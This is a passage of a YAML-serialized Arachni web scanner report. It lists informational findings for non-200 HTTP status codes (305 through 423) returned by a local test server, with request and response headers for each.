      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3055902"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/305
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/306
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 306"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 306"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3061747"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/306
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/307
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 307"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 307"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3078017"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/307
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/308
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 308"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 308"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3087898"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/308
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/400
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 400"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 400"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4004182"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/400
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/401
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 401"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 401"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4019741"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/401
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/402
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 402"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 402"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "402947"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/402
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/403
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 403"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 403"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4033215"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/403
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/405
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 405"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 405"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4058359"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/405
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/406
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 406"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 406"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4069247"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/406
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/407
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 407"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 407"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4072668"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/407
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/408
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 408"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 408"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4084774"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/408
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/410
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 410"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 410"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4107989"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/410
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/411
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 411"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 411"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4114162"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/411
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/412
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 412"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 412"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4126668"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/412
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/413
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 413"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 413"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4131511"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/413
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/414
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 414"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 414"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4146576"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/414
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/415
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 415"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 415"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4157981"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/415
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/409
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 409"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 409"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "40978"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/409
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/416
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 416"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 416"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4162213"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/416
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/417
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 417"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 417"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "417528"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/417
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/418
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 418"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 418"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4186798"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/418
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/420
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 420"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 420"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4207568"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/420
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/422
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 422"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 422"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4222698"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/422
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/423
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 423"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 423"
      :element: server
